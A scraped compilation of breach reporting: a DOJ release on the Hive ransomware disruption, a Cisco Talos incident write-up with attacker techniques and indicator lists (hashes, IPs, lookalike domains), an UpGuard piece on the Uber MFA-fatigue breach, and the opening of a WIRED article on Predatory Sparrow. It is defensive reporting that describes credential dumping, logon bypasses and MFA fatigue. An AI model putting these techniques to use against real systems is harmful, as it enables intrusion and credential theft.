IT vs OT Cybersecurity
AI Cybersecurity
Cyber Threat Intelligence
Cybersecurity Management
Network Security
Data Security
Email Security
Endpoint Security
Web Security
Enterprise Security
Cybersecurity Mesh

Quick Links

Fortinet Products
Fortinet Demos
Analyst Reports

Speak with an Expert

Please fill out the form and a knowledgeable representative will get in touch with you soon.

By clicking submit you agree to the Fortinet Terms and Conditions & Privacy Policy .

An official website of the United States government

Here's how you know

Official websites use .gov A .gov website belongs to an official government organization in the United States.

Secure .gov websites use HTTPS A lock ( Lock A locked padlock ) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.

The Attorney General
Organizational Chart
Budget & Performance
Privacy Program
Press Releases
Photo Galleries
Guidance Documents
Publications
Information for Victims in Large Cases
Justice Manual
Business and Contracts
Why Justice ?
DOJ Vacancies
Legal Careers at DOJ
Our Offices

Archived Press Releases

Archived News

Para Notícias en Español

U.S. Department of Justice Disrupts Hive Ransomware Variant

The Justice Department announced today its months-long disruption campaign against the Hive ransomware group that has targeted more than 1,500 victims in over 80 countries around the world, including hospitals, school districts, financial firms, and critical infrastructure.

Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive’s network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack. In addition, the FBI distributed over 1,000 additional decryption keys to previous Hive victims. Finally, the department announced today that, in coordination with German law enforcement (the German Federal Criminal Police and Reutlingen Police Headquarters-CID Esslingen) and the Netherlands National High Tech Crime Unit, it has seized control of the servers and websites that Hive uses to communicate with its members, disrupting Hive's ability to attack and extort victims.

“Last night, the Justice Department dismantled an international ransomware network responsible for extorting and attempting to extort hundreds of millions of dollars from victims in the United States and around the world,” said Attorney General Merrick B. Garland. “Cybercrime is a constantly evolving threat. But as I have said before, the Justice Department will spare no resource to identify and bring to justice, anyone, anywhere, who targets the United States with a ransomware attack. We will continue to work both to prevent these attacks and to provide support to victims who have been targeted. And together with our international partners, we will continue to disrupt the criminal networks that deploy these attacks.”

“The Department of Justice’s disruption of the Hive ransomware group should speak as clearly to victims of cybercrime as it does to perpetrators,” said Deputy Attorney General Lisa O. Monaco. “In a 21st century cyber stakeout, our investigative team turned the tables on Hive, swiping their decryption keys, passing them to victims, and ultimately averting more than $130 million dollars in ransomware payments. We will continue to strike back against cybercrime using any means possible and place victims at the center of our efforts to mitigate the cyber threat.”

“The coordinated disruption of Hive’s computer networks, following months of decrypting victims around the world, shows what we can accomplish by combining a relentless search for useful technical information to share with victims with investigation aimed at developing operations that hit our adversaries hard,” said FBI Director Christopher Wray. “The FBI will continue to leverage our intelligence and law enforcement tools, global presence, and partnerships to counter cybercriminals who target American business and organizations."

“Our efforts in this case saved victims over a hundred million dollars in ransom payments and likely more in remediation costs,” said Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division. “This action demonstrates the Department of Justice’s commitment to protecting our communities from malicious hackers and to ensuring that victims of crime are made whole. Moreover, we will continue our investigation and pursue the actors behind Hive until they are brought to justice.”

“Cybercriminals utilize sophisticated technologies to prey upon innocent victims worldwide,” said U.S. Attorney Roger Handberg for the Middle District of Florida. “Thanks to the exceptional investigative work and coordination by our domestic and international law enforcement partners, further extortion by HIVE has been thwarted, critical business operations can resume without interruption, and millions of dollars in ransom payments were averted.”

Since June 2021, the Hive ransomware group has targeted more than 1,500 victims around the world and received over $100 million in ransom payments.

Hive ransomware attacks have caused major disruptions in victim daily operations around the world and affected responses to the COVID-19 pandemic. In one case, a hospital attacked by Hive ransomware had to resort to analog methods to treat existing patients and was unable to accept new patients immediately following the attack.

Hive used a ransomware-as-a-service (RaaS) model featuring administrators, sometimes called developers, and affiliates. RaaS is a subscription-based model where the developers or administrators develop a ransomware strain and create an easy-to-use interface with which to operate it and then recruit affiliates to deploy the ransomware against victims. Affiliates identified targets and deployed this readymade malicious software to attack victims and then earned a percentage of each successful ransom payment.

Hive actors employed a double-extortion model of attack. Before encrypting the victim system, the affiliate would exfiltrate or steal sensitive data. The affiliate then sought a ransom for both the decryption key necessary to decrypt the victim’s system and a promise to not publish the stolen data. Hive actors frequently targeted the most sensitive data in a victim’s system to increase the pressure to pay. After a victim pays, affiliates and administrators split the ransom 80/20. Hive published the data of victims who do not pay on the Hive Leak Site.

According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Hive affiliates have gained initial access to victim networks through a number of methods, including: single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols; exploiting FortiToken vulnerabilities; and sending phishing emails with malicious attachments. For more information about the malware, including technical information for organizations about how to mitigate its effects, is available from CISA, visit https://www.cisa.gov/uscert/ncas/alerts/aa22-321a .

Victims of Hive ransomware should contact their local FBI field office for further information.

The FBI Tampa Field Office, Orlando Resident Agency is investigating the case.

Trial Attorneys Christen Gallagher and Alison Zitron of the Criminal Division’s Computer Crime and Intellectual Property Section and Assistant U.S. Attorney Chauncey Bratt for the Middle District of Florida are prosecuting the case.

The Justice Department also recognizes the critical cooperation of the German Reutlingen Police Headquarters-CID Esslingen, the German Federal Criminal Police, Europol, and the Netherlands Politie, and significant assistance was provided by the U.S. Secret Service, U.S. Attorney’s Office for the Eastern District of Virginia, and U.S. Attorney’s Office for the Central District of California. The Justice Department’s Office of International Affairs and the Cyber Operations International Liaison also provided significant assistance. Additionally, the following foreign law enforcement authorities provided substantial assistance and support: the Canadian Peel Regional Police and Royal Canadian Mounted Police, French Direction Centrale de la Police Judiciaire, Lithuanian Criminal Police Bureau, Norwegian National Criminal Investigation Service in collaboration with the Oslo Police District, Portuguese Polícia Judiciária, Romanian Directorate of Countering Organized Crime, Spanish Policia Nacional, Swedish Police Authority, and the United Kingdom’s National Crime Agency.

Cisco Talos Blog

Cisco Talos shares insights related to recent cyber attack on Cisco

This post is also available in:.

日本語 (Japanese)

Update History

Date	Description of Updates
Aug. 10th 2022	Adding clarifying details on activity involving active directory.
Aug. 10th 2022	Update made to the Cisco Response and Recommendations section related to MFA.

Executive summary

On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.
During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized.
The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.
CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.
After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.
We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
For further information see the Cisco Response page here .

Initial vector

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

Post-compromise TTPs

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:

They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.

This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.

On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.

The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.

In many cases, we observed the attacker removing the previously created local administrator account.

To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.

We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.

The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:

This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

Backdoor analysis

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:

The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:

Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.

The aforementioned HTTP requests are sent using the following user-agent string:

The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:

The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

Attack attribution

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.

Cisco response and recommendations

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.

Win.Exploit.Kolobko-9950675-0
Win.Backdoor.Kolobko-9950676-0

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.

For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.

Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack.

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.

Mitre ATT&CK mapping

All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred.

Initial Access

ATT&CK Technique : Phishing (T1566)

ATT&CK Technique : Valid Accounts (T1078)

ATT&CK Technique : System Services: Service Execution (T1569.002)

Persistence

ATT&CK Technique : Create Account: Local Account (T1136.001)

ATT&CK Technique : Account Manipulation: Device Registration (T1098.005)

Privilege Escalation

ATT&CK Technique : Event Triggered Execution: Image File Execution Options Injection (T1546.012)

Defense Evasion

ATT&CK Technique : Indicator Removal on Host (T1070)

ATT&CK Technique : Indicator Removal on Host: Clear Windows Event Logs (T1070.001)

ATT&CK Technique : Masquerading: Match Legitimate Name or Location (T1036.005)

ATT&CK Technique : Impair Defenses: Disable or Modify System Firewall (T1562.004)

ATT&CK Technique : Modify Registry (T1112)

Credential Access

ATT&CK Technique : OS Credential Dumping: LSASS Memory (T1003.001)

ATT&CK Technique : OS Credential Dumping: Security Account Manager (T1003.002)

ATT&CK Technique : OS Credential Dumping: NTDS (T1003.003)

ATT&CK Technique : Multi-Factor Authentication Request Generation (T1621)

Lateral Movement

ATT&CK Technique : Remote Services (T1021)

ATT&CK Technique : Query Registry (T1012)

Command and Control

ATT&CK Technique : Application Layer Protocol: Web Protocols (T1071.001)

ATT&CK Technique : Remote Access Software (T1219)

ATT&CK Technique: Encrypted Channel: Asymmetric Cryptography (T1573.002)

ATT&CK Technique : Proxy: Multi-hop Proxy (T1090.003)

Exfiltration

ATT&CK Technique : Exfiltration Over Alternative Protocol (T1048)

Indicators of compromise

The following indicators of compromise were observed associated with this attack.

Hashes (SHA256)

184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3 2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03 542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d 61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610 753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647 8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a 8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190 99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7 eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18

IP Addresses

104.131.30[.]201 108.191.224[.]47 131.150.216[.]118 134.209.88[.]140 138.68.227[.]71 139.177.192[.]145 139.60.160[.]20 139.60.161[.]99 143.198.110[.]248 143.198.131[.]210 159.65.246[.]188 161.35.137[.]163 162.33.177[.]27 162.33.178[.]244 162.33.179[.]17 165.227.219[.]211 165.227.23[.]218 165.232.154[.]73 166.205.190[.]23 167.99.160[.]91 172.56.42[.]39 172.58.220[.]52 172.58.239[.]34 174.205.239[.]164 176.59.109[.]115 178.128.171[.]206 185.220.100[.]244 185.220.101[.]10 185.220.101[.]13 185.220.101[.]15 185.220.101[.]16 185.220.101[.]2 185.220.101[.]20 185.220.101[.]34 185.220.101[.]45 185.220.101[.]6 185.220.101[.]65 185.220.101[.]73 185.220.101[.]79 185.220.102[.]242 185.220.102[.]250 192.241.133[.]130 194.165.16[.]98 195.149.87[.]136 24.6.144[.]43 45.145.67[.]170 45.227.255[.]215 45.32.141[.]138 45.32.228[.]189 45.32.228[.]190 45.55.36[.]143 45.61.136[.]207 45.61.136[.]5 45.61.136[.]83 46.161.27[.]117 5.165.200[.]7 52.154.0[.]241 64.227.0[.]177 64.4.238[.]56 65.188.102[.]43 66.42.97[.]210 67.171.114[.]251 68.183.200[.]63 68.46.232[.]60 73.153.192[.]98 74.119.194[.]203 74.119.194[.]4 76.22.236[.]142 82.116.32[.]77 87.251.67[.]41 94.142.241[.]194

cisco-help[.]cf cisco-helpdesk[.]cf ciscovpn1[.]com ciscovpn2[.]com ciscovpn3[.]com devcisco[.]com devciscoprograms[.]com helpzonecisco[.]com kazaboldu[.]net mycisco[.]cf mycisco[.]gq mycisco-helpdesk[.]ml primecisco[.]com pwresetcisco[.]com

Email Addresses

costacancordia[@]protonmail[.]com

Share this post

Related content, talos joins cisa to counter cyber threats against non-profits, activists and other at-risk communities.

Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression.

What’s the deal with the massive backlog of vulnerabilities at the NVD?

Given the state of the NVD and vulnerability management, we felt it was worth looking at the current state of the NVD, how we got to this point, what it means for security teams, and where we go from here.

New decryptor for Babuk Tortilla ransomware variant released

Cisco Talos obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor.

BreachSight

Vendor risk, trust exchange, product features, vendor risk assessments, security questionnaires.

Security Ratings

Data Leaks Detection

Integrations

AI Autofill

Customer success.

Financial Services

eBooks, Reports, & more

What caused the uber data breach in 2022.

Edward Kost

A complete guide to data breaches.

Download this eBook to learn how to avoid a costly data breach with a comprehensive prevention strategy.

The Uber data breach began with a hacker purchasing stolen credentials belonging to an Uber employee from a dark web marketplace. An initial attempt to connect to Uber’s network with these credentials failed because the account was protected with MFA. To overcome this security obstacle, the hacker contacted the Uber employee via What’s App and, while pretending to be a member of Uber’s security, asked the employee to approve the MFA notifications being sent to their phone. The hacker then sent a flood of MFA notifications to the employee’s phone to pressure them into succumbing to this request. To finally put an end to this notification storm, the Uber employee approved an MFA request, granting the hacker network access, which ultimately led to the data breach.

After completing the attack, the hacker compromised an Uber employee’s Slack account and announced the successful breach to the entire company.

Screenshot of the hacker's breach announcement in Uber's Slack channel

This isn’t the first time Uber has been hacked. In 2016, two hackers breached Uber’s systems , accessing names, email addresses, and phone numbers of 57 million users of the Uber app.

What Data Did the Hacker Access?

After successfully connecting to Uber’s intranet, the hacker gained access to the company’s VPN and discovered Microsoft Powershell scripts containing the login credentials of an admin user in Thycotic - the company’s Privileged Access Management (PAM) solution . This discovery significantly increased the severity of the breach by facilitating full admin access to all of Uber’s sensitive services, including DA, DUO, Onelogin, Amazon Web Services (AWS), and GSuite.

The hacker also allegedly accessed Uber’s bug bounty reports which usually contain details of security vulnerabilities yet to be remediated.

The 18-year-old hacker, believed to be associated with the cybercriminal group, Lapsus$, revealed the details of the attack in a conversation with cybersecurity researcher Corben Leo .

Was any Sensitive User Data Stolen During the Uber Breach?

Despite the deep level of compromise the hacker achieved, no evidence of customer data theft has been announced. This is likely because the hacker wasn’t intent on causing harm but was, rather, chasing the thrill of a successful cyberattack and the hacker community respect that comes with it.

Had the hacker been motivated by financial gain, he would have likely sold Uber’s bug bounty reports on a dark web marketplace. Given the devastating data breach impact that’s possible with the findings of a bug bounty program, it would have sold for a very high price.

To say that Uber is lucky this hacker wasn’t an actual cybercriminal is a significant understatement. The company came so close to a complete system shutdown. From a cybersecurity perspective, it seems almost unbelievable that after taking complete control of Uber’s systems, the hacker just dropped everything and walked away. Without any security obstacles left to overcome, it would have been so easy to tie off the breach with a quick installation of ransomware.

Given Uber’s poor reputation for handling extorsion attempts, thankfully, this didn’t happen. When Uber was breached in 2016, the company paid the cybercriminals their $100,000 ransom in exchange for deleting their copy of the stolen data. Then, in an attempt to conceal the event, the company forced the hackers to sign a non-disclosure agreement and made it appear like the ransom payment was an innocuous reward within the company’s bug bounty program.

is your business at risk of a data breach?

4 Key Lesson From the Uber Data Breach

Several critical cybersecurity lessons can be learned from the Uber data breach. By applying them to your cybersecurity efforts, you could potentially avoid suffering a similar fate.

1. Implement Cyber Awareness Training

The fact that the Uber employee eventually gave into the flood of MFA requests in the initial stage of the attack is evidence of poor awareness of a common MFA exploitation tactic known as MFA Fatigue. Had the Uber employee been aware of this tactic, they would have likely reported the threat rather than falling victim to it, which would have prevented the breach from happening. The hacker also utilized social engineering techniques to fool the Uber employee into thinking they were a member of Uber’s security team, which is another common cyberattack tactic.

Implementing cyber awareness training will equip your staff to recognize the common cyberattack methods that made this breach possible - MFA fatigue and social engineering.

The following free resources can be used to educate your employees about common cyber threats and the importance of cybersecurity:

What is Phishing?
What is Ransomware-as-a-Service?
What is Malware?
What is a Cyber Threat?
Why is Cybersecurity Important?
What is a Data Breach?

2. Be Aware of Common MFA Exploitation Methods

Not all Multi-Factor Authentication protocols are equal. Some are more vulnerable to compromise than others. Your cybersecurity teams should compare your current MFA processes against common exploit tactics and, if required, upgrade the complexity of authentication protocols to mitigate exploitation.

Learn about common MFA bypass methods >

3. Never Hardcode Admin Login Credentials Anywhere (Ever)

Probably the most embarrassing cybersecurity blunder in this incident is the hardcoding of admin credentials inside a Powershell script. This meant that the potential of an unauthorized user accessing uber’s sensitive systems was always there - all that was required was for someone to read the Powershell script and discover admin credentials contained therein.

This security flaw would have been avoided if secure coding practices had been followed. Admin credentials should always be stored securely in a password vault and certainly never hardcoded anywhere.

4. Implement a Data Leak Detection Service

If the Uber hacker had more malicious intentions, customer data woud have been stolen, published on the dark web, and accessed multiple times by cybercriminals before Uber even realized it was breached. It’s crucial for organizations to have a safety net in place for detecting dark web data leaks from undetected data breaches, from both first-hand and third-party attacks.

A data leak detection service notifies impacted businesses when sensitive data leaks are detected on the dark web so that cybersecurity teams can secure compromised accounts before they’re targeted in follow up attacks.

Learn how data leak detection can reduce the impact of ransomware attacks.

See how your organization's security posture compares to Uber's.

View Uber's security report .

Learn about other Famous Data Breaches:

What Caused the Optus Data Breach?
What Caused the Medicare Data Breach?
How did LAUSD Get Hacked?
How did Plex Get Hacked?
How did Cash App Get Hacked?

Reviewed by

Kaushik Sen

Ready to see upguard in action, ready to save time and streamline your trust management process, join 27,000+ cybersecurity newsletter subscribers.

How to prevent data breaches in 2024 (highly effective strategy), the 72 biggest data breaches of all time [updated 2024].

9 Ways to Prevent Third-Party Data Breaches in 2024

What are cloud leaks, what is a supply chain attack examples & prevention strategies, zero trust as a defence against supply chain attacks.

UpGuard Vendor Risk
UpGuard BreachSight
Product Video
Release notes
SecurityScorecard
All comparisons
Security Reports
Instant Security Score
Third-Party Risk Management
Attack Surface Management
Cybersecurity

To revisit this article, visit My Profile, then View saved stories .

The Big Story
Newsletters
Steven Levy's Plaintext Column
WIRED Classics from the Archive
WIRED Insider
WIRED Consulting

How a Group of Israel-Linked Hackers Has Pushed the Limits of Cyberwar

A blue colored rip through a mosaic of green and black and white images showing smoke and embers in a mill.

About eight minutes after 3 am on June 27, 2022, inside the Khouzestan steel mill near Iran's western coastline on the Persian Gulf, a massive lid lowered onto a vat of glowing, molten metal. Based on footage from a surveillance camera inside the plant, the giant vessel was several times taller than the two workers in gray uniforms and hardhats standing nearby, likely large enough to carry well over a hundred tons of liquid steel heated to several thousand degrees Fahrenheit.

In the video, the two workers walk out of frame. The clip jump-cuts forward 10 minutes. Then suddenly, the giant ladle is moving, swinging steadily toward the camera. A fraction of a second later, burning embers fly in all directions, fire and smoke fill the factory, and incandescent, liquid steel can be seen pouring freely out of the bottom of the vat onto the plant floor.

Written across the bottom of the video is a kind of disclaimer from Predatory Sparrow, the group of hackers who took credit for this cyber-induced mayhem and posted the video clip to their channel on the messaging service Telegram: “As you can see in this video,” it reads, “this cyberattack has been carried out carefully so to protect innocent individuals.”

A close watch of the video, in fact, reveals something like the opposite: Eight seconds after the steel mill catastrophe begins, two workers can be seen running out from underneath the ladle assembly, through the shower of embers, just feet away from the torrent of flaming liquid metal. “If they were closer to the ladle egress point, they would have been cooked,” says Paul Smith, the chief technology officer of industrial-focused cybersecurity firm SCADAfence, who analyzed the attack . “Imagine getting hit by 1,300-degrees-Celsius molten steel. That's instant death.”

A clip from a video posted by Predatory Sparrow hacker group showing the effects of its cyberattack on Khouzestan steel mill in Iran. Although the group claims in the video’s text to have taken care to protect “innocent individuals,” two steelworkers can be seen (circled in red) narrowly escaping the spill of molten metal and the resulting fire that the hackers triggered.

The Khouzestan steel mill sabotage represents one of only a handful of examples in history of a cyberattack with physically destructive effects. But for Predatory Sparrow, it was just a part of a years-long career of digital intrusions that includes several of the most aggressive offensive hacking incidents ever documented. In the years before and after that attack—which targeted three Iranian steelworks, though only one intrusion successfully caused physical destruction—Predatory Sparrow crippled the country's railway system computers and disrupted payment systems across the majority of Iran's gas station pumps not once but twice, including in an attack last month that once again disabled point-of-sale systems at more than 4,000 gas stations, creating a nationwide fuel shortage.

In fact, Predatory Sparrow, which typically refers to itself in public statements by the Farsi translation of its name, Gonjeshke Darande, has been tightly focused on Iran for years, long before Israel's war with Hamas further raised tensions between the two countries. Very often the hackers target the Iranian civilian population with disruptive attacks that follow Iran's own acts of aggression through hacking or military proxies. The latest gas station attack, for instance, came after Iran-linked hackers compromised Israeli-made equipment at water utilities around the world and Iran-backed Houthi rebels launched missiles at Israel and attacked shipping vessels in the Red Sea. “Khamenei!” Predatory Sparrow wrote in Farsi on its Twitter feed, addressing Iran's supreme leader. “We will react against your evil provocations in the region.”

While Predatory Sparrow maintains the veneer of a hacktivist group—often affecting the guise of one that is itself Iranian—its technical sophistication hints at likely involvement from a government or military. US defense sources speaking to The New York Times in 2021 linked the hackers to Israel . Yet some cybersecurity analysts who track the group say that even as it carries out attacks that fit most definitions of cyberwar , one of its hallmarks is restraint—limiting the damage it could cause while demonstrating it could have achieved more. Attempting to achieve an appearance of restraint, at least, might be more accurate: The physical endangerment of at least two Khouzestan staffers in its steel mill attack represents a glaring exception to its claims of safety.

Predatory Sparrow is distinguished most of all by its apparent interest in sending a specific geopolitical message with its attacks, says Juan Andres Guerrero-Saade, an analyst at cybersecurity firm SentinelOne who has tracked the group for years. Those messages are all variations on a theme: If you attack Israel or its allies, we have the ability to deeply disrupt your civilization. “They're showing that they can reach out and touch Iran in meaningful ways,” Guerrero-Saade says. “They're saying, ‘You can prop up the Houthis and Hamas and Hezbollah in these proxy wars. But we, Predatory Sparrow, can dismantle your country piece by piece without having to move from where we are.’”

Here's a brief history of Predatory's short but distinguished track record of hyper-disruptive cyberattacks.

